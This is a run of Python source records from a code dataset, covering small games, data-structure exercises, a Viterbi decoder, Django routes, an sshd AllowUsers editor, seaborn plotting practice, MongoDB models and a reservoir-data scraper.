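# Illustrative wiring, assuming segments are linked head -> middle -> tail.
head, mid, tail = Segment(5, 5), Segment(5, 4), Segment(5, 3)
head.setNext(mid)
mid.setNext(tail)
snake = Snake(head, tail)
snake.move()  # direction starts as "down", so the head steps to (5, 6)
# Each segment now occupies its predecessor's old cell:
assert (head.X, head.Y) == (5, 6)
assert (mid.X, mid.Y) == (5, 5)
assert (tail.X, tail.Y) == (5, 4)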
\n def isDead(self, height, width):\n if self.length > 4:\n currentSeg = self.head.next.next.next\n for i in range (self.length):\n if currentSeg.X == self.head.X and currentSeg.Y == self.head.Y:\n return True\n if i < self.length-4:\n currentSeg = currentSeg.next\n if self.head.Y < 0 or self.head.Y >= height or self.head.X >= width or self.head.X < 0:\n return True\n\n def grow(self):\n self.length += 1\n newSeg = Segment(self.head.X, self.head.Y)\n newSeg.next = self.head\n self.head = newSeg\n \nclass Apple: \n\n def __init__ (self, width, height):\n self.xMax = width - 1\n self.yMax = height - 1\n self.generate()\n\n def generate(self):\n self.X = random.randint(0, self.xMax)\n self.Y = random.randint(0, self.yMax) \n ","sub_path":"Snake AI/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"461991871","text":"# -*- coding:utf8 -*-\nimport sys\n\n\nclass ListNode:\n\tvalue = \"\"\n\tnext = None\n\tdef __init__(self):\n\t\tself.value = \"\"\n\t\tself.next = None\n\ndef constructList(List):\n\theadNode = None\n\tfor item in List:\n\t\theadNode = addToTail(headNode , item)\n\treturn headNode\ndef addToTail(listNode , value):\n\tnewNode = ListNode()\n\tnewNode.value = value\n\tnewNode.next = None\n\tif listNode == None:\n\t\theadNode = newNode\n\telse:\n\t\theadNode = listNode\n\t\twhile listNode.next != None:\n\t\t\tlistNode = listNode.next\n\t\tlistNode.next = newNode\n\treturn headNode\ndef addToHead(listNode , value):\n\tnewNode = ListNode()\n\tnewNode.value = value\n\tnewNode.next = listNode\n\treturn newNode\ndef removeNode(listNode , value):\n\t# Drop matching nodes at the head first; the original only removed a\n\t# matching head when it was the sole node in the list\n\twhile listNode != None and listNode.value == value:\n\t\tlistNode = listNode.next\n\tif listNode == None:\n\t\treturn None\n\theadNode = listNode\n\twhile listNode.next != None:\n\t\tif listNode.next.value != value:\n\t\t\tlistNode = listNode.next\n\t\telse:\n\t\t\tlistNode.next = listNode.next.next\n\treturn headNode\n","sub_path":"ListNode.py","file_name":"ListNode.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"45263101","text":"#\n# @lc app=leetcode id=949 lang=python3\n#\n# [949] Largest Time for Given Digits\n#\nclass Solution:\n def largestTimeFromDigits(self, A):\n A.sort()\n for h in range(23, -1, -1):\n for m in range(59, -1, -1):\n t = [int(h / 10), h % 10, int(m / 10), m % 10]\n ts = sorted(t)\n if ts == A:\n return str(t[0]) + str(t[1]) + \":\" + str(t[2]) + str(t[3])\n return \"\"\n","sub_path":"leetcode/949.largest-time-for-given-digits.py","file_name":"949.largest-time-for-given-digits.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"42371184","text":"import pandas as pd\nimport os\nimport numpy as np\nimport xlsxwriter\n\n\n\nall_df_list = []\n\ncwd = os.path.abspath('')\nfiles = os.listdir(cwd)\nwriter = pd.ExcelWriter(cwd + '//Sorted_Stocks.xlsx', engine = 'xlsxwriter')\ncounter = 0\n\nfor file in files:\n if file.endswith ('.csv'):\n all_df_list.append(pd.read_csv(file))\n if(len(all_df_list) > 50):\n counter = counter + 1\n appended_df = pd.concat(all_df_list)\n appended_df.to_excel(writer, sheet_name = 'Set' + str(counter))\n all_df_list = []\n\n# Flush the leftover frames; the original skipped any final batch of 50 or fewer\nif all_df_list:\n counter = counter + 1\n appended_df = pd.concat(all_df_list)\n appended_df.to_excel(writer, sheet_name = 'Set' + str(counter))\n\nwriter.save()\nwriter.close()\n\n#appended_df.to_excel(\"Sorted_Stocks.xlsx\", index=False)\n","sub_path":"Sorter2.py","file_name":"Sorter2.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"491321470","text":"# Read the octal value to convert\nx = str(input(\"Enter the octal value to convert:\"))\n# Mapping from each octal digit to its three binary bits\ndict1 = {\"0\":\"000\",\n \"1\":\"001\",\n \"2\":\"010\",\n \"3\":\"011\",\n \"4\":\"100\",\n \"5\":\"101\",\n \"6\":\"110\",\n \"7\":\"111\",\n}\nlist1 = []\nlist2 = []\n# Split x into single digits and store them in list1\nlist1.extend(x)\n# Walk over the digits\nfor i in list1:\n # Look up each digit's binary triplet in dict1 and collect it in list2\n list2.append(dict1.get(i))\n# Join the list into a single string\nstr1 = ''.join(list2)\n# Print the binary result (int() drops any leading zeros)\nprint(int(str1))\n
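The lookup-table conversion above works digit by digit, but note that the final int(str1) reinterprets the binary string as a base-10 number, which drops leading zeros. For comparison, a sketch of the same octal-to-binary conversion using only the standard library (the variable names here are mine):

octal_text = "157"
# int(..., 8) parses the octal digits; format(..., 'b') renders the value in base 2.
as_binary = format(int(octal_text, 8), 'b')
print(as_binary)  # -> 1101111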
","sub_path":"SmallProgram/demo07.py","file_name":"demo07.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"445377564","text":"import numpy as np\r\n\r\n\r\ndef run_viterbi(emission_scores, trans_scores, start_scores, end_scores):\r\n \"\"\"Run the Viterbi algorithm.\r\n\r\n N - number of tokens (length of sentence)\r\n L - number of labels\r\n\r\n As an input, you are given:\r\n - Emission scores, as an NxL array - score[token][label]\r\n - Transition scores (Yp -> Yc), as an LxL array\r\n - Start transition scores (S -> Y), as an Lx1 array\r\n - End transition scores (Y -> E), as an Lx1 array\r\n\r\n You have to return a tuple (s,y), where:\r\n - s is the score of the best sequence\r\n - y is the size N array/seq of integers representing the best sequence.\r\n \"\"\"\r\n L = start_scores.shape[0]\r\n assert end_scores.shape[0] == L\r\n assert trans_scores.shape[0] == L\r\n assert trans_scores.shape[1] == L\r\n assert emission_scores.shape[1] == L\r\n N = emission_scores.shape[0]\r\n\r\n y = [] # score table\r\n sequence = [0]*N # final sequence\r\n bp = [] # backpointers\r\n # init table, N rows and L columns\r\n for i in range(N):\r\n y.append([0]*L)\r\n\r\n # init backpointer table, N-1 rows, L columns\r\n for i in range(N-1):\r\n bp.append([0]*L)\r\n\r\n for i in range(N):\r\n for y_i in range(L):\r\n max_score = float(\"-inf\")\r\n for y_prev in range(L):\r\n score = 0\r\n if i == 0: # if first token, use start transition\r\n # note, previous score is zero\r\n score = emission_scores[i][y_i] + start_scores[y_i]\r\n else: # else lookup transition score in table\r\n score = emission_scores[i][y_i] + trans_scores[y_prev][y_i] + y[i-1][y_prev]\r\n \r\n if score > max_score:\r\n max_score = score\r\n if i > 0: # update backpointer table\r\n bp[i-1][y_i] = y_prev\r\n y[i][y_i] = max_score \r\n\r\n final_score = float(\"-inf\")\r\n for y_end in range(L): # consider end transition scores, assume zero emission for eos\r\n # y_end is the label of the last token\r\n score = end_scores[y_end] + y[N-1][y_end]\r\n if score > final_score: \r\n final_score = score\r\n sequence[-1] = y_end\r\n\r\n # build the sequence by walking the backpointers from the last token\r\n for i in range(-1, -N, -1):\r\n sequence[i-1] = bp[i][sequence[i]]\r\n\r\n return (final_score, sequence)","sub_path":"hw3/viterbi.py","file_name":"viterbi.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"356722416","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom Users import views\nfrom . 
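As a quick sanity check of run_viterbi above, a toy problem with N=3 tokens and L=2 labels can be decoded end to end; all of the numbers below are invented for illustration.

import numpy as np
# run_viterbi as defined in hw3/viterbi.py above

emission = np.log(np.array([[0.9, 0.1],
                            [0.2, 0.8],
                            [0.6, 0.4]]))  # N=3 tokens, L=2 labels
trans = np.log(np.array([[0.7, 0.3],
                         [0.4, 0.6]]))     # score of moving prev -> next label
start = np.log(np.array([0.5, 0.5]))
end = np.log(np.array([0.5, 0.5]))

score, path = run_viterbi(emission, trans, start, end)
print(score, path)  # best joint log-score and the arg-max label sequence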
import views as betting_app_views\n\nurlpatterns = [\n\n ##############################\n # Admin\n ##############################\n url(r'^admin/', include(admin.site.urls)),\n\n ##############################\n # Accounts\n ##############################\n url(r'^$', betting_app_views.index, name='index'),\n url(r'^login/$', views.login, name='login'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^register/$', views.register, name='register'),\n\n ##############################\n # Search\n ##############################\n url(r'^search/$', views.search_redirect, name='search_redirect'),\n url(r'^search-home/$', views.search_home, name='search_home'),\n url(r'^search/(?P[a-zA-Z0-9]+)$', views.search, name='search'),\n\n ##############################\n # User\n ##############################\n url(r'^me/$', views.me, name='me'),\n url(r'^notifications/$', views.notifications, name='notifications'),\n url(r'^requests/$', views.friend_requests, name='requests'),\n url(r'^friends/$', views.friends, name='friends'),\n url(r'^new-bet-user/$', views.new_bet_user, name='new-bet-user'),\n url(r'^new-bet/$', views.new_bet, name='new-bet'),\n url(r'^bets/$', views.bets, name='bets'),\n url(r'^bets/(?P[\\w\\W]+)/$', views.bets_title, name='bets_title'),\n url(r'^(?P[\\w]+)/', include('Users.urls')),\n\n\n]\n","sub_path":"betting_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"352006743","text":"#!/usr/bin/env python3\n\nimport logging\nimport os\nimport re\nimport sys\nimport tempfile\nfrom shutil import move\n\nfrom api2sshallowedusers.helpers import Command\n\nlogger = logging.getLogger(__name__)\n\n\ndef find_daemon():\n if Command('systemd', 'sshd').check():\n return Command('systemd', 'sshd')\n elif Command('init', 'ssh').check():\n return Command('init', 'ssh')\n elif Command('init', 'sshd').check():\n return Command('init', 'sshd')\n else:\n logger.error('is sshd running ? 
(i can only reload)')\n logger.error('exiting..')\n sys.exit(1)\n\n\nclass SSHConfig(object):\n def __init__(self, file):\n\n self.sshd = find_daemon()\n self.users = []\n self.restricted_users = False\n self.regex_users = re.compile('^AllowUsers (\\w+ ?)*$')\n\n try:\n self.filename = os.path.abspath(file)\n logger.info('using ssh config file : %s' % self.filename)\n with open(self.filename, 'r+'):\n pass\n except PermissionError:\n logger.error('cant open file for modifications, exiting..')\n sys.exit(1)\n except FileNotFoundError:\n logger.error('cant find file, exiting..')\n sys.exit(1)\n\n with open(self.filename, 'r') as f:\n for line in f:\n if self.regex_users.match(line):\n self.users = line.split()\n self.users.remove('AllowUsers')\n self.restricted_users = True\n\n logger.info('users: %s' % self.users)\n\n def add_user(self, user):\n if user not in self.users:\n logger.info('adding user %s' % user)\n self.users.append(user)\n return self.commit()\n return False\n\n def del_user(self, user):\n if user in self.users:\n logger.info('removing user %s' % user)\n self.users.remove(user)\n return self.commit()\n return False\n\n def commit(self):\n new_config, new_config_name = tempfile.mkstemp(dir=os.getcwd())\n with open(new_config, 'w') as new:\n with open(self.filename, 'r') as old:\n for line in old:\n if self.regex_users.match(line):\n new.write('AllowUsers {users}\\n'.format(\n users=' '.join(self.users)))\n else:\n new.write(line)\n if not self.restricted_users:\n new.write('AllowUsers {users}\\n'.format(\n users=' '.join(self.users)))\n self.restricted_users = True\n try:\n move(new_config_name, self.filename)\n except Exception:\n logger.error('cant write new sshd_config file')\n return False\n return True\n","sub_path":"api2sshallowedusers/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"297444507","text":"import pandas as pd\nimport seaborn as sns\nimport numpy as np\n\n\n######################################################################\n### Plotting with relative data #\n######################################################################\ntips = pd.read_csv(\"C:/Users/SumitPawar/Python_classes/GitCode/Python_Practice/datasets/seaborn-data/tips.csv\")\nsns.set()\n\nsns.load_dataset(\"tips\")\n\n# print(tips.get(\"total_bill\"))\n\nsns.relplot(x=\"total_bill\",\n y=\"tip\",\n col=\"time\",\n hue=\"smoker\",\n size=\"size\",\n style=\"smoker\",\n data=tips)\nsns.relplot(x=\"total_bill\", y=\"tip\", size=\"size\", sizes=(15, 200), data=tips);\n\n\n#prepare a dataframe and plot using lineplot\ndf = pd.DataFrame(time=np.arange(500),\n value=np.random.randn().cumsum())\ng=sns.relplot(x=\"time\",y=\"value\",kind=\"line\",data=df)\ng.fig.autofmt_xdate()\n\n#disable the default sort\ndf = pd.DataFrame(np.random.randn(500, 2).cumsum(axis=0),\n columns=[\"x\", \"y\"])\nsns.relplot(x=\"x\", y=\"y\", sort=False, kind=\"line\", data=df);\n\nfmri = sns.load_dataset(\"fmri\")\nsns.relplot(x=\"timepoint\", y=\"signal\", kind=\"line\", data=fmri);\n\n#Without confidence interval\nfmri = sns.load_dataset(\"fmri\")\nsns.relplot(x=\"timepoint\", y=\"signal\", kind=\"line\", data=fmri,ci=None);\n\nsns.relplot(x=\"timepoint\", y=\"signal\", estimator=None, kind=\"line\", data=fmri);\n\n#to turn off the estimator\nsns.relplot(x=\"timepoint\", y=\"signal\", estimator=None, kind=\"line\", data=fmri);\n\nsns.relplot(x=\"timepoint\", y=\"signal\", hue=\"event\", 
kind=\"line\", data=fmri);\n\n#to plot markers for identification of subset\nsns.relplot(x=\"timepoint\",y=\"signal\",hue=\"region\",style=\"event\",dashes=False,markers=True,kind=\"line\",data=fmri)\n\nemp_df = pd.read_csv(\"C:/Users/SumitPawar/Python_classes/GitCode/Python_Practice/datasets/seaborn-data/employee.csv\")\nprint(emp_df)\n\nsns.relplot(x=\"empdeptname\",y=\"empsalary\",hue=\"empdeptname\",style=\"empdeptname\",kind=\"scatter\",data=emp_df)\n\nsns.relplot(x=\"timepoint\", y=\"signal\", hue=\"region\",\n units=\"subject\", estimator=None,\n kind=\"line\", data=fmri.query(\"event == 'stim'\"));\n\ndots = pd.read_csv(\"C:/Users/SumitPawar/Python_classes/GitCode/Python_Practice/datasets/seaborn-data/dots.csv\")\n\nprint(dots)\n\nsns.relplot(x=\"time\",y=\"firing_rate\",hue=\"coherence\",style=\"choice\",kind=\"line\",data=dots)\n\n\n##changing the color of the data presentation\npalette = sns.cubehelix_palette(light=.8, n_colors=10)\nsns.relplot(x=\"time\",\n y=\"firing_rate\",\n hue=\"coherence\",\n style=\"choice\",\n kind=\"line\",\n palette=palette,\n data=dots)\n\n##use size to increase the visibility of the lines plotted\nsns.relplot(x=\"timepoint\", y=\"signal\", hue=\"subject\",\n col=\"region\", row=\"event\", height=3,\n kind=\"line\", estimator=None, data=fmri);\n\n#plot multiple facets/graph based on column and number of individual graphs\nsns.relplot(x=\"timepoint\", y=\"signal\", hue=\"event\", style=\"event\",\n col=\"subject\", col_wrap=5,\n height=3, aspect=.50, linewidth=2.5,\n kind=\"line\", data=fmri.query(\"region == 'frontal'\"));\n\n\n######################################################################\n### Plotting with categorical data #\n######################################################################\n# Categorical scatterplots:\n# stripplot() (with kind=\"strip\"; the default)\n# swarmplot() (with kind=\"swarm\")\n# Categorical distribution plots:\n# boxplot() (with kind=\"box\")\n# violinplot() (with kind=\"violin\")\n# boxenplot() (with kind=\"boxen\")\n# Categorical estimate plots:\n# pointplot() (with kind=\"point\")\n# barplot() (with kind=\"bar\")\n# countplot() (with kind=\"count\")\nimport matplotlib.pyplot as plt\nsns.set(style=\"ticks\",color_codes=True)\ntips=pd.read_csv(\"C:/Users/SumitPawar/Python_classes/GitCode/Python_Practice/datasets/seaborn-data/tips.csv\")\n\nprint(tips)\nsns.catplot(x=\"day\",y=\"tip\",data=tips)\nsns.catplot(x=\"day\",y=\"tip\",jitter=False,data=tips)\n\n##beesswarn by setting kind=\"swarm\"\nsns.catplot(x=\"day\",y=\"tip\",kind=\"swarm\",data=tips)\nsns.catplot(x=\"day\",y=\"tip\",kind=\"swarm\",hue=\"smoker\",data=tips.query(\"day=='Sun'\"))\n\n#order the x-axis elements usig list\nsns.catplot(x=\"day\", y=\"tip\", order=[\"Sun\",\"Mon\",\"Tue\",\"Wed\",\"Thur\",\"Fri\",\"Sat\"], data=tips);\n\n#When the data is clumpsy and we need to represent on the graph use box scatter option\nsns.catplot(x=\"day\", y=\"tip\", kind=\"box\", data=tips);\n\n##Use different kind\nsns.catplot(x=\"day\", y=\"tip\", kind=\"strip\",hue=\"smoker\",order=[\"Thur\",\"Fri\",\"Sat\",\"Sun\"], data=tips);\nsns.catplot(x=\"day\", y=\"tip\", kind=\"violin\",hue=\"smoker\",order=[\"Thur\",\"Fri\",\"Sat\",\"Sun\"], data=tips);\nsns.catplot(x=\"day\", y=\"tip\", kind=\"boxen\",hue=\"smoker\",order=[\"Thur\",\"Fri\",\"Sat\",\"Sun\"], data=tips);\nsns.catplot(x=\"day\", y=\"tip\", kind=\"point\",hue=\"smoker\",order=[\"Thur\",\"Fri\",\"Sat\",\"Sun\"], data=tips);\nsns.catplot(x=\"day\", y=\"tip\", 
kind=\"bar\",hue=\"smoker\",order=[\"Thur\",\"Fri\",\"Sat\",\"Sun\"], data=tips);\n\n# for count we need to set one of the axis as None\nsns.catplot(x=\"day\", y=None, kind=\"count\",hue=\"smoker\",order=[\"Thur\",\"Fri\",\"Sat\",\"Sun\"], data=tips);\n\n##Boxen plot\n##load the diamond dataset\ndiamonds=pd.read_csv(\"C:/Users/SumitPawar/Python_classes/GitCode/Python_Practice/datasets/seaborn-data/diamonds.csv\")\nsns.load_dataset(diamonds)\nsns.catplot(x=\"color\",y=\"price\",kind=\"boxen\",data=diamonds.sort_values(\"color\"));\nsns.catplot(x=\"cut\",y=\"price\",kind=\"boxen\",data=diamonds.sort_values(\"color\"));\n\n##palette = pastel is to reduce the color intensity and inner stick is to mark the widht length\n## split=True splits based on the hue part\nsns.catplot(x=\"day\", y=\"total_bill\", hue=\"sex\",\n kind=\"violin\", inner=\"stick\", split=True,\n palette=\"pastel\", data=tips);\n\n## Using barplot to plot the bars instead of scatterplot and swarmplot\ntitanic=sns.load_dataset(\"titanic\")\nsns.catplot(x=\"sex\",y=\"survived\",hue=\"class\",kind=\"bar\",data=titanic)\n\n##Violinplot\nsns.violinplot(x=\"day\",y=\"total_bill\",data=tips)\n\n######################################################################\n### Plotting distribution of a dataset #\n######################################################################\n##For univariate we can use kdeplot and for bivariate we can use kdeplot,joinplot and pairplot\n## to plot the relationship between variables\nx=np.random.normal(4,2,size=40)\nsns.kdeplot(x,shade=True,kernel=\"gau\",bw=\"scott\",gridsize=100,cut=3,clip=None,legend=True)\nsns.kdeplot(x,bw=0.2,label=\"bw:0.2\")\n\n##bandwidth shows the estimation with respect to the smallest and largest values in the dataset\n\nx=np.random.gamma(6,2,200)\nsns.distplot(x,kde=False)\n\nmean, cov = [0, 1], [(1, .5), (.5, 1)]\ndata = np.random.multivariate_normal(mean, cov, 200)\ndf = pd.DataFrame(data, columns=[\"x\", \"y\"])\n\nsns.scatterplot(x=\"x\",y=\"y\",data=df)\nsns.jointplot(x=\"x\",y=\"y\",data=df)\n\nx, y = np.random.multivariate_normal(mean, cov, 1000).T\n#style must be one of white, dark, whitegrid, darkgrid, ticks\nwith sns.axes_style(\"white\"):\n sns.jointplot(x=x, y=y, kind=\"hex\", color=\"k\");\n\nsns.jointplot(x=\"x\",y=\"y\",data=df,kind=\"kde\")\n\nf, ax = plt.subplots(figsize=(6, 6))\ncmap = sns.cubehelix_palette(as_cmap=True, dark=0, light=1, reverse=True)\nsns.kdeplot(df.x, df.y, cmap=cmap, n_levels=60, shade=True);\n\niris=sns.load_dataset(\"iris\")\nsns.pairplot(iris)\n\nsns.pairplot(iris,hue=\"species\")\n\n##Analysing the data using linear model and regression model techniques\n## methods used here are lmplot() and regplot()\nsns.lmplot(x=\"total_bill\",y=\"tip\",hue=\"smoker\",data=tips)\n\nsns.lmplot(x=\"size\",y=\"tip\",data=tips,x_estimator=np.mean)\n\nanscombe=sns.load_dataset(\"sns\")\nsns.lmplot(x=\"x\", y=\"y\", data=anscombe.query(\"dataset == 'I'\"),\n ci=None, scatter_kws={\"s\": 80});\n\n##User defined dataframe\nemp_df=pd.read_csv(\"C:/Users/SumitPawar/Python_classes/GitCode/Python_Practice/datasets/seaborn-data/employee.csv\")\nsns.lmplot(x=\"empid\",y=\"empsalary\",hue=\"empdeptname\",data=emp_df)\n\n#residplot\nsns.residplot(x=\"x\", y=\"y\", data=anscombe.query(\"dataset == 'I'\"),\n scatter_kws={\"s\": 80});\n\n##Creating multi plot grids\ntips=sns.load_dataset(\"tips\")\n#Below line creates the empty graph\ng=sns.FacetGrid(tips,col=\"time\")\n\n#Below line plots the Facetgrid on to the 
graph\ng.map(plt.hist,\"tip\")\n\ng=sns.FacetGrid(tips,col=\"time\",hue=\"smoker\")\ng.map(plt.hist,\"tip\")\n\n\ng=sns.FacetGrid(tips,col=\"time\",hue=\"smoker\")\ng.map(plt.scatter,\"total_bill\",\"tip\",alpha=.7)\n\ng=sns.FacetGrid(data=tips,row=\"smoker\",col=\"time\",margin_titles=True)\ng.map(sns.regplot,\"total_bill\",\"tip\",color=\".3\",fit_reg=False,x_jitter=.1)\n\npal = dict(Lunch=\"seagreen\", Dinner=\"gray\")\ng = sns.FacetGrid(tips, hue=\"time\", palette=pal, height=5)\ng.map(plt.scatter, \"total_bill\", \"tip\", s=50, alpha=.7, linewidth=.5, edgecolor=\"white\")\n\n\n##Changing the content of the x and y axis\nwith sns.axes_style(\"white\"):\n g = sns.FacetGrid(tips, row=\"sex\", col=\"smoker\", margin_titles=True, height=2.5)\ng.map(plt.scatter, \"total_bill\", \"tip\", color=\"#334488\", edgecolor=\"white\", lw=.5);\ng.set_axis_labels(\"Total bill (US Dollars)\", \"Tip\");\ng.set(xticks=[10, 30, 50], yticks=[2, 6, 10]);\ng.fig.subplots_adjust(wspace=.02, hspace=.02);\n\n","sub_path":"Libraries/seaborn_library/seaborn_lib.py","file_name":"seaborn_lib.py","file_ext":"py","file_size_in_byte":9262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"173394537","text":"from enum import unique\nfrom utilities import AppContext\nfrom db import get_db\nfrom anuvaad_auditor.loghandler import log_info, log_exception\nimport pymongo\nfrom config import MONGO_s3_LINK_STORE\n\nDB_SCHEMA_NAME = 'file_content'\n\nclass BlockModel(object):\n def __init__(self):\n collections = get_db()[DB_SCHEMA_NAME]\n try:\n collections.create_index('record_id')\n except pymongo.errors.DuplicateKeyError as e:\n log_info(\"duplicate key, ignoring\", AppContext.getContext())\n except Exception as e:\n log_exception(\"db connection exception \", AppContext.getContext(), e)\n \n try:\n ref_repo = get_db()[MONGO_s3_LINK_STORE]\n ref_repo.create_index('job_id',unique=True)\n except Exception as e:\n log_exception(\"db connection exception \", AppContext.getContext(), e)\n \n def update_block(self, record_id, user_id, block_identifier, block):\n try:\n collections = get_db()[DB_SCHEMA_NAME]\n results = collections.update({'$and': [{'record_id': record_id}, {'created_by': user_id}, { 'block_identifier': block_identifier }]},\n { '$set': block }, upsert=True)\n\n if 'writeError' in list(results.keys()):\n return False\n return True\n\n except Exception as e:\n log_exception(\"db connection exception \", AppContext.getContext(), e)\n return False\n\n def store_bulk_blocks(self, blocks):\n try:\n collections = get_db()[DB_SCHEMA_NAME]\n results = collections.insert_many(blocks)\n if len(blocks) == len(results.inserted_ids):\n return True\n except Exception as e:\n log_exception(\"db connection exception \", AppContext.getContext(), e)\n return False\n\n def get_all_blocks(self, user_id, record_id):\n try:\n collections = get_db()[DB_SCHEMA_NAME]\n docs = collections.find({\n 'record_id': record_id,\n 'created_by': user_id\n })\n return docs\n except Exception as e:\n log_exception(\"db connection exception \", AppContext.getContext(), e)\n return False\n \n\n def get_blocks_by_page(self, record_id, page_number):\n try:\n collections = get_db()[DB_SCHEMA_NAME]\n results = collections.aggregate([\n { '$match' : {'page_no': page_number,'record_id': record_id} },\n { '$group': { '_id': '$data_type', 'data': { '$push': \"$data\" } } }\n ])\n return results\n except Exception as e:\n AppContext.addRecordID(record_id)\n log_exception(\"db connection exception \", 
AppContext.getContext(), e)\n return False\n\n def get_block_by_block_identifier(self, record_id, user_id, block_identifier):\n try:\n collections = get_db()[DB_SCHEMA_NAME]\n results = collections.aggregate([\n { '$match' : {'record_id': record_id, 'block_identifier': block_identifier, 'created_by': user_id } },\n { '$group': { '_id': '$data_type', 'data': { '$push': \"$data\" } } }\n ])\n return results\n except Exception as e:\n log_exception('db connection exception ', AppContext.getContext(), e)\n return None\n\n def get_document_total_page_count(self, record_id):\n try:\n collections = get_db()[DB_SCHEMA_NAME]\n results = collections.aggregate([\n { '$match' : { 'record_id': record_id } },\n {\n '$group':\n {\n '_id': '$record_id',\n 'page_count': { '$max': \"$page_no\" }\n }\n }\n ])\n\n count = 0\n for result in results:\n count = result['page_count']\n break\n\n return count\n except Exception as e:\n log_exception(\"db connection exception \", AppContext.getContext(), e)\n return 0\n\n def store_s3_link(self, data):\n try:\n collections = get_db()[MONGO_s3_LINK_STORE]\n record = collections.find({\"job_id\":data[\"job_id\"]})\n # if record.count() == 0:\n if record.count() != 0:\n print(True)\n collections.update_one({'job_id': data['job_id']},\n { '$set': { \"file_link.parallel_doc\" : data['file_link']['parallel_doc']} })\n else:\n print(False)\n collections.insert(data)\n \n except Exception as e:\n log_exception(\"db connection exception |{}\".format(str(e)), AppContext.getContext(), e)\n return False\n\n def get_s3_link(self, job_id):\n try:\n collections = get_db()[MONGO_s3_LINK_STORE]\n result = collections.find({\"job_id\":job_id},{\"_id\":0})\n return result[0]\n except Exception as e:\n log_exception(\"db connection exception |{}\".format(str(e)), AppContext.getContext(), e)\n return False","sub_path":"anuvaad-etl/anuvaad-extractor/content-handler/src/models/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"533660014","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 15 18:14:48 2016\n\n@author: escriva\n\"\"\"\n\n\"\"\"\nSELECTED CDEC SENSOR NUMBERS (these are not be available for all sites):\n 1 river stage [ft]\n 2 precipitation, accumulated [in]\n 3 SWE [in]\n 4 air temperature [F]\n 5 EC [ms/cm]\n 6 reservoir elevation [ft]\n 7 reservoir scheduled release [cfs]\n 8 full natural flow [cfs]\n 15 reservoir storage [af]\n 20 flow -- river discharge [cfs]\n 22 reservoir storage change [af]\n 23 reservoir outflow [cfs]\n 24 Evapotranspiration [in]\n 25 water temperature [F]\n 27 water turbidity [ntu]\n 28 chlorophyll [ug/l]\n 41 flow -- mean daily [cfs]\n 45 precipitation, incremental [in]\n 46 runoff volume [af]\n 61 water dissolved oxygen [mg/l]\n 62 water pH value [pH]\n 64 pan evaporation (incremental) [in]\n 65 full natural flow [af]\n 66 flow -- monthly volume [af]\n 67 accretions (estimated) [af]\n 71 spillway discharge [cfs]\n 74 lake evaporation (computed) [cfs]\n 76 reservoir inflow [cfs]\n 85 control regulating discharge [cfs]\n 94 top conservation storage (reservoir) [af]\n 100 water EC [us/cm]\n CDEC DURATION CODES:\n E event\n H hourly\n D daily\n M monthly\n\"\"\"\nimport ScrappingWater as sw\nimport pandas as pd\n\nlist = ['MIL', 'BUC', 'MAR', 'BAR', 'BUR', 'EXC', 'DNP', 'NML', 'CMN']\n\nresults=[]\n\nfor reservoir in list:\n df = sw.get_CDEC_data(station_id=reservoir)\n dfsum = df[['01', '02', '03' , 
'04','05','06','07','08','09','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31']]\n dfsum = dfsum.convert_objects(convert_numeric=True)\n df['Total'] = dfsum.mean(axis=1)\n df['NANs'] = dfsum.isnull().values.sum(axis=1)\n df['Year']=df.iloc[:,2]\n df['Month']=df.iloc[:,3]\n df['Date']=pd.to_datetime(df.Year*10000+df.Month*100+1,format='%Y%m%d') \n df['Reservoir']=df.iloc[:,0]\n del dfsum\n dfshort = df[['Date','Total', 'NANs']]\n results.append(dfshort)\n del df\n \nfor i in range(9):\n results[i].to_csv(\"ReservoirResults\"+list[i]+\".csv\")\n results[i] = results[i].rename(columns={'Total':'Total'+list[i], 'Reservoir' : 'Reservoir'+list[i]})\n\"\"\" \na = results[0].merge(results[1],on='Date').merge(results[2],on='Date').merge(results[3],on='Date').merge(results[4],on='Date').merge(results[5],on='Date').merge(results[6],on='Date').merge(results[7],on='Date').merge(results[8],on='Date')\na.to_csv(\"ReservoirResultsMerged.csv\")\n\"\"\"","sub_path":"scrappingWithScript.py","file_name":"scrappingWithScript.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"54417430","text":"from unittest.mock import patch\nfrom intake.tests.base_testcases import IntakeDataTestCase\nfrom django.db.models import Count\nfrom user_accounts import models, exceptions\nfrom intake import models as intake_models\nfrom user_accounts.tests import mock\nfrom intake import constants\n\n\nclass TestOrganization(IntakeDataTestCase):\n\n fixtures = [\n 'counties',\n 'organizations', 'mock_profiles',\n 'mock_2_submissions_to_a_pubdef',\n 'mock_2_submissions_to_ebclc',\n 'mock_2_submissions_to_cc_pubdef',\n 'mock_2_submissions_to_sf_pubdef',\n 'mock_2_submissions_to_monterey_pubdef',\n 'mock_1_submission_to_multiple_orgs',\n 'mock_application_events',\n ]\n\n def test_has_a_pdf(self):\n 